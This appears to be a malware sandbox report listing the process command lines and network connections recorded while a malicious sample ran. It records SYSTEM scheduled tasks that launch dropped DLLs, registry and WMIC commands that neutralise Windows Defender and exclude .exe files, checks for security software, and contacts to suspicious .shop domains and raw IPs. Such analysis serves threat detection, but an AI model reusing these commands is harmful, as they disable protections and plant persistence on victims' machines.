"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff9fe1d46f8,0x7ff9fe1d4708,0x7ff9fe1d4718

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "GJlNcuNKEmfKGuMTK2" /F /xml "C:\Program Files (x86)\NuNDxVhSfKiQUmJwJAR\WcNgtzj.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 5960 -ip 5960

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5960 -s 3168

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "jVeWQSRcqyudsTDYlcg2" /F /xml "C:\Program Files (x86)\QtKEgKYoTGTqC\wreHbsL.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "BjyVbWVaXyfCTlHuI" /SC once /ST 06:19:10 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\QqEAMUespgTHJnVz\fziOnKcf\eBOGRLS.dll\",#1 /kpdidI 385118" /V1 /F

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "BjyVbWVaXyfCTlHuI"

C:\Windows\system32\rundll32.EXE

C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\QqEAMUespgTHJnVz\fziOnKcf\eBOGRLS.dll",#1 /kpdidI 385118

C:\Windows\SysWOW64\rundll32.exe

C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\QqEAMUespgTHJnVz\fziOnKcf\eBOGRLS.dll",#1 /kpdidI 385118

C:\Users\Admin\AppData\Local\Temp\DQsmlqqwNqJuTewVy\vUpjdUek\jeyJgLg.exe

"C:\Users\Admin\AppData\Local\Temp\DQsmlqqwNqJuTewVy\vUpjdUek\jeyJgLg.exe" /S zs

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "BjyVbWVaXyfCTlHuI"

C:\Windows\SysWOW64\cmd.exe

cmd /c copy /b Ph + Shoot 331913\r

C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\331913\Rent.pif

331913\Rent.pif 331913\r

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6

C:\Windows\SysWOW64\PING.EXE

ping -n 5 127.0.0.1

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"

C:\Windows\SysWOW64\cmd.exe

/C powershell start-process -WindowStyle Hidden gpupdate.exe /force

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell start-process -WindowStyle Hidden gpupdate.exe /force

C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe

C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe

C:\Users\Admin\Desktop\a\Newoff.exe

C:\Users\Admin\Desktop\a\Newoff.exe

C:\ProgramData\cmd.exe

C:\ProgramData\cmd.exe

C:\Windows\SysWOW64\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"

C:\Windows\SysWOW64\cmd.exe

/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\gpupdate.exe

"C:\Windows\system32\gpupdate.exe" /force

C:\Windows\SysWOW64\Wbem\WMIC.exe

"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff9fe1d46f8,0x7ff9fe1d4708,0x7ff9fe1d4718

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "btZaCbGShXZoJDfvCg" /SC once /ST 16:42:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\DQsmlqqwNqJuTewVy\vUpjdUek\jeyJgLg.exe\" PP /S" /V1 /F

C:\Windows\SysWOW64\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C schtasks /run /I /tn btZaCbGShXZoJDfvCg"

C:\Windows\SysWOW64\cmd.exe

/C schtasks /run /I /tn btZaCbGShXZoJDfvCg

\??\c:\windows\SysWOW64\schtasks.exe

schtasks /run /I /tn btZaCbGShXZoJDfvCg

C:\Users\Admin\AppData\Local\Temp\DQsmlqqwNqJuTewVy\vUpjdUek\jeyJgLg.exe

C:\Users\Admin\AppData\Local\Temp\DQsmlqqwNqJuTewVy\vUpjdUek\jeyJgLg.exe PP /S

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff9fe1d46f8,0x7ff9fe1d4708,0x7ff9fe1d4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ff9fe1d46f8,0x7ff9fe1d4708,0x7ff9fe1d4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff9fe1d46f8,0x7ff9fe1d4708,0x7ff9fe1d4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff9fe1d46f8,0x7ff9fe1d4708,0x7ff9fe1d4718

C:\Windows\system32\gpscript.exe

gpscript.exe /RefreshSystemParam

C:\Windows\SysWOW64\tasklist.exe

tasklist

C:\Windows\SysWOW64\findstr.exe

findstr /I "wrsa.exe opssvc.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 209.205.72.20.in-addr.arpa udp
US 8.8.8.8:53 0.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 www.google.com udp
GB 142.250.187.196:443 www.google.com udp
GB 142.250.187.196:443 www.google.com tcp
US 8.8.8.8:53 234.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 3.200.250.142.in-addr.arpa udp
US 8.8.8.8:53 196.187.250.142.in-addr.arpa udp
US 8.8.8.8:53 apis.google.com udp
GB 142.250.200.14:443 apis.google.com udp
US 8.8.8.8:53 195.212.58.216.in-addr.arpa udp
US 8.8.8.8:53 play.google.com udp
GB 142.250.179.238:443 play.google.com udp
GB 142.250.179.238:443 play.google.com tcp
US 8.8.8.8:53 238.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 clients2.google.com udp
GB 142.250.187.238:443 clients2.google.com udp
GB 142.250.187.238:443 clients2.google.com tcp
N/A 224.0.0.251:5353 udp
US 8.8.8.8:53 238.187.250.142.in-addr.arpa udp
US 8.8.8.8:53 145.83.221.88.in-addr.arpa udp
US 8.8.8.8:53 filescan.io udp
US 172.67.70.67:443 filescan.io tcp
US 172.67.70.67:443 filescan.io tcp
US 8.8.8.8:53 www.filescan.io udp
US 8.8.8.8:53 cdnjs.cloudflare.com udp
US 104.26.14.230:443 www.filescan.io udp
US 104.17.25.14:443 cdnjs.cloudflare.com tcp
US 8.8.8.8:53 67.70.67.172.in-addr.arpa udp
US 8.8.8.8:53 230.14.26.104.in-addr.arpa udp
US 8.8.8.8:53 202.187.250.142.in-addr.arpa udp
US 8.8.8.8:53 cdn-cookieyes.com udp
US 104.26.14.230:443 www.filescan.io udp
US 104.22.58.91:443 cdn-cookieyes.com tcp
US 8.8.8.8:53 log.cookieyes.com udp
IE 52.31.17.134:443 log.cookieyes.com tcp
US 104.17.25.14:443 cdnjs.cloudflare.com udp
US 104.22.58.91:443 cdn-cookieyes.com tcp
US 8.8.8.8:53 content-autofill.googleapis.com udp
US 8.8.8.8:53 platform.twitter.com udp
GB 172.217.169.74:443 content-autofill.googleapis.com tcp
NL 192.229.233.25:443 platform.twitter.com tcp
US 8.8.8.8:53 14.25.17.104.in-addr.arpa udp
US 8.8.8.8:53 91.58.22.104.in-addr.arpa udp
US 8.8.8.8:53 134.17.31.52.in-addr.arpa udp
US 8.8.8.8:53 74.169.217.172.in-addr.arpa udp
US 8.8.8.8:53 25.233.229.192.in-addr.arpa udp
GB 172.217.169.74:443 content-autofill.googleapis.com udp
US 8.8.8.8:53 syndication.twitter.com udp
US 104.244.42.200:443 syndication.twitter.com tcp
NL 192.229.233.25:443 platform.twitter.com tcp
NL 192.229.233.25:443 platform.twitter.com tcp
NL 192.229.233.25:443 platform.twitter.com tcp
NL 192.229.233.25:443 platform.twitter.com tcp
NL 192.229.233.25:443 platform.twitter.com tcp
US 8.8.8.8:53 200.42.244.104.in-addr.arpa udp
US 8.8.8.8:53 directory.cookieyes.com udp
IE 52.210.197.119:443 directory.cookieyes.com tcp
US 8.8.8.8:53 119.197.210.52.in-addr.arpa udp
US 8.8.8.8:53 urlhaus.abuse.ch udp
US 151.101.2.49:443 urlhaus.abuse.ch tcp
RU 147.45.47.70:80 147.45.47.70 tcp
CN 124.71.81.174:80 tcp
US 8.8.8.8:53 49.2.101.151.in-addr.arpa udp
US 8.8.8.8:53 70.47.45.147.in-addr.arpa udp
US 8.8.8.8:53 105.83.221.88.in-addr.arpa udp
US 8.8.8.8:53 23.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 f.123654987.xyz udp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 185.199.108.133:443 raw.githubusercontent.com tcp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
DE 49.13.194.118:80 49.13.194.118 tcp
RU 5.42.66.47:80 5.42.66.47 tcp
US 8.8.8.8:53 free.360totalsecurity.com udp
US 8.8.8.8:53 118.194.13.49.in-addr.arpa udp
US 8.8.8.8:53 47.66.42.5.in-addr.arpa udp
NL 151.236.127.172:443 free.360totalsecurity.com tcp
RU 88.212.252.98:443 softcatalog.ru tcp
US 8.8.8.8:53 172.127.236.151.in-addr.arpa udp
US 8.8.8.8:53 st.p.360safe.com udp
US 8.8.8.8:53 s.360safe.com udp
IE 54.77.42.29:3478 st.p.360safe.com udp
IE 54.77.42.29:3478 st.p.360safe.com udp
US 8.8.8.8:53 iup.360safe.com udp
US 8.8.8.8:53 tr.p.360safe.com udp
IE 54.76.174.118:80 tr.p.360safe.com udp
DE 52.29.179.141:80 s.360safe.com tcp
NL 151.236.127.172:80 iup.360safe.com tcp
NL 151.236.127.172:80 iup.360safe.com tcp
NL 151.236.127.172:80 iup.360safe.com tcp
NL 151.236.127.172:80 iup.360safe.com tcp
NL 151.236.127.172:80 iup.360safe.com tcp
US 8.8.8.8:53 98.252.212.88.in-addr.arpa udp
US 8.8.8.8:53 29.42.77.54.in-addr.arpa udp
US 8.8.8.8:53 118.174.76.54.in-addr.arpa udp
US 8.8.8.8:53 141.179.29.52.in-addr.arpa udp
SG 118.194.235.187:50500 tcp
DE 52.29.179.141:80 s.360safe.com tcp
US 8.8.8.8:53 int.down.360safe.com udp
MD 94.103.188.126:80 94.103.188.126 tcp
US 104.192.108.21:80 int.down.360safe.com tcp
US 104.192.108.17:80 int.down.360safe.com tcp
US 104.192.108.20:80 int.down.360safe.com tcp
US 104.192.108.21:80 int.down.360safe.com tcp
US 104.192.108.20:80 int.down.360safe.com tcp
US 8.8.8.8:53 126.188.103.94.in-addr.arpa udp
US 8.8.8.8:53 187.235.194.118.in-addr.arpa udp
US 104.192.108.17:80 int.down.360safe.com tcp
US 8.8.8.8:53 sd.p.360safe.com udp
GB 99.86.249.221:80 sd.p.360safe.com tcp
US 8.8.8.8:53 17.108.192.104.in-addr.arpa udp
US 8.8.8.8:53 21.108.192.104.in-addr.arpa udp
US 8.8.8.8:53 20.108.192.104.in-addr.arpa udp
US 8.8.8.8:53 221.249.86.99.in-addr.arpa udp
DE 52.29.179.141:80 s.360safe.com tcp
US 8.8.8.8:53 iplogger.com udp
US 104.21.76.57:443 iplogger.com tcp
US 8.8.8.8:53 57.76.21.104.in-addr.arpa udp
US 8.8.8.8:53 www.google.com udp
GB 142.250.187.196:443 www.google.com tcp
GB 142.250.187.196:443 www.google.com tcp
GB 142.250.187.196:443 www.google.com udp
US 8.8.8.8:53 ogs.google.com udp
US 8.8.8.8:53 apis.google.com udp
GB 142.250.187.238:443 ogs.google.com tcp
GB 142.250.200.14:443 apis.google.com tcp
GB 142.250.187.238:443 ogs.google.com tcp
GB 142.250.200.14:443 apis.google.com tcp
US 8.8.8.8:53 ssl.gstatic.com udp
GB 172.217.169.3:443 ssl.gstatic.com tcp
US 8.8.8.8:53 play.google.com udp
US 8.8.8.8:53 3.169.217.172.in-addr.arpa udp
GB 142.250.179.238:443 play.google.com tcp
US 8.8.8.8:53 pepecasas123.net udp
DE 195.10.205.90:4608 pepecasas123.net tcp
US 8.8.8.8:53 90.205.10.195.in-addr.arpa udp
DE 49.13.194.118:53848 tcp
DE 195.10.205.90:4608 pepecasas123.net tcp
US 8.8.8.8:53 checkforupdate.sytes.net udp
NL 185.73.125.6:80 185.73.125.6 tcp
US 8.8.8.8:53 6.125.73.185.in-addr.arpa udp
CN 119.91.25.19:8888 tcp
US 8.8.8.8:53 api.ipify.org udp
US 104.26.13.205:80 api.ipify.org tcp
SG 118.194.235.187:50500 tcp
US 8.8.8.8:53 205.13.26.104.in-addr.arpa udp
RU 91.215.85.135:80 91.215.85.135 tcp
US 8.8.8.8:53 135.85.215.91.in-addr.arpa udp
US 8.8.8.8:53 49.192.11.51.in-addr.arpa udp
US 8.8.8.8:53 files2.tech udp
SG 118.194.235.187:50500 tcp
N/A 10.127.0.1:445 tcp
N/A 10.127.0.1:139 tcp
DE 77.91.77.33:80 77.91.77.33 tcp
US 8.8.8.8:53 checkforupdate.sytes.net udp
US 8.8.8.8:53 33.77.91.77.in-addr.arpa udp
EE 45.129.96.86:80 45.129.96.86 tcp
US 8.8.8.8:53 86.96.129.45.in-addr.arpa udp
US 8.8.8.8:53 doggie-services.com udp
US 8.8.8.8:53 fragmentyperspowp.shop udp
US 104.21.20.181:443 fragmentyperspowp.shop tcp
US 8.8.8.8:53 ipinfo.io udp
FR 5.42.67.23:80 doggie-services.com tcp
US 8.8.8.8:53 181.20.21.104.in-addr.arpa udp
US 34.117.186.192:443 ipinfo.io tcp
US 8.8.8.8:53 db-ip.com udp
US 34.117.186.192:443 ipinfo.io tcp
US 172.67.75.166:443 db-ip.com tcp
US 8.8.8.8:53 horsedwollfedrwos.shop udp
US 172.67.75.166:443 db-ip.com tcp
US 104.21.74.118:443 horsedwollfedrwos.shop tcp
US 8.8.8.8:53 23.67.42.5.in-addr.arpa udp
US 8.8.8.8:53 192.186.117.34.in-addr.arpa udp
US 8.8.8.8:53 166.75.67.172.in-addr.arpa udp
US 8.8.8.8:53 patternapplauderw.shop udp
US 172.67.174.208:443 patternapplauderw.shop tcp
US 8.8.8.8:53 118.74.21.104.in-addr.arpa udp
N/A 10.127.0.1:135 tcp
US 8.8.8.8:53 understanndtytonyguw.shop udp
RU 195.2.70.38:30001 195.2.70.38 tcp
US 172.67.203.201:443 understanndtytonyguw.shop tcp
DE 185.172.128.90:80 185.172.128.90 tcp
US 8.8.8.8:53 208.174.67.172.in-addr.arpa udp
RU 94.103.90.9:25349 tcp
DE 49.13.194.118:80 49.13.194.118 tcp
US 34.117.186.192:443 ipinfo.io tcp
US 8.8.8.8:53 38.70.2.195.in-addr.arpa udp
US 8.8.8.8:53 201.203.67.172.in-addr.arpa udp
US 8.8.8.8:53 90.128.172.185.in-addr.arpa udp
US 8.8.8.8:53 considerrycurrentyws.shop udp
US 172.67.170.57:443 considerrycurrentyws.shop tcp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 185.199.108.133:80 raw.githubusercontent.com tcp
US 185.199.108.133:80 raw.githubusercontent.com tcp
US 185.199.108.133:80 raw.githubusercontent.com tcp
US 185.199.108.133:443 raw.githubusercontent.com tcp
RU 5.42.66.47:80 5.42.66.47 tcp
US 185.199.108.133:80 raw.githubusercontent.com tcp
US 8.8.8.8:53 9.90.103.94.in-addr.arpa udp
US 8.8.8.8:53 57.170.67.172.in-addr.arpa udp
US 185.199.108.133:80 raw.githubusercontent.com tcp
US 185.199.108.133:80 raw.githubusercontent.com tcp
US 185.199.108.133:443 raw.githubusercontent.com tcp
US 8.8.8.8:53 messtimetabledkolvk.shop udp
DE 185.172.128.90:80 185.172.128.90 tcp
US 104.21.8.238:443 messtimetabledkolvk.shop tcp
DE 185.172.128.69:80 185.172.128.69 tcp
US 8.8.8.8:53 detailbaconroollyws.shop udp
US 8.8.8.8:53 238.8.21.104.in-addr.arpa udp
US 8.8.8.8:53 69.128.172.185.in-addr.arpa udp
US 172.67.193.11:443 detailbaconroollyws.shop tcp
US 8.8.8.8:53 11.193.67.172.in-addr.arpa udp
DE 185.172.128.69:80 185.172.128.69 tcp
US 8.8.8.8:53 deprivedrinkyfaiir.shop udp
US 172.67.134.244:443 deprivedrinkyfaiir.shop tcp
US 8.8.8.8:53 relaxtionflouwerwi.shop udp
US 8.8.8.8:53 244.134.67.172.in-addr.arpa udp
US 172.67.190.237:443 relaxtionflouwerwi.shop tcp
US 8.8.8.8:53 237.190.67.172.in-addr.arpa udp
KR 43.155.163.53:24543 tcp
RU 147.45.47.155:80 147.45.47.155 tcp
US 8.8.8.8:53 53.163.155.43.in-addr.arpa udp
N/A 10.127.0.1:135 tcp
KR 43.155.163.53:24543 tcp
US 8.8.8.8:53 pastebin.com udp
US 8.8.8.8:53 yip.su udp
US 172.67.169.89:443 yip.su tcp
US 8.8.8.8:53 roomabolishsnifftwk.shop udp
US 104.20.4.235:443 pastebin.com tcp
US 104.21.55.87:443 roomabolishsnifftwk.shop tcp
US 8.8.8.8:53 89.169.67.172.in-addr.arpa udp
US 8.8.8.8:53 235.4.20.104.in-addr.arpa udp
DE 185.172.128.82:80 185.172.128.82 tcp
US 8.8.8.8:53 gigapub.ma udp
RU 5.42.66.47:80 5.42.66.47 tcp
FR 51.75.247.100:443 gigapub.ma tcp
US 8.8.8.8:53 free.360totalsecurity.com udp
RU 5.42.66.47:80 5.42.66.47 tcp
NL 151.236.127.172:443 free.360totalsecurity.com tcp
US 8.8.8.8:53 87.55.21.104.in-addr.arpa udp
US 8.8.8.8:53 82.128.172.185.in-addr.arpa udp
US 8.8.8.8:53 100.247.75.51.in-addr.arpa udp
US 8.8.8.8:53 museumtespaceorsp.shop udp
US 104.21.32.80:443 museumtespaceorsp.shop tcp
US 8.8.8.8:53 80.32.21.104.in-addr.arpa udp
US 8.8.8.8:53 buttockdecarderwiso.shop udp
US 172.67.218.187:443 buttockdecarderwiso.shop tcp
US 8.8.8.8:53 187.218.67.172.in-addr.arpa udp
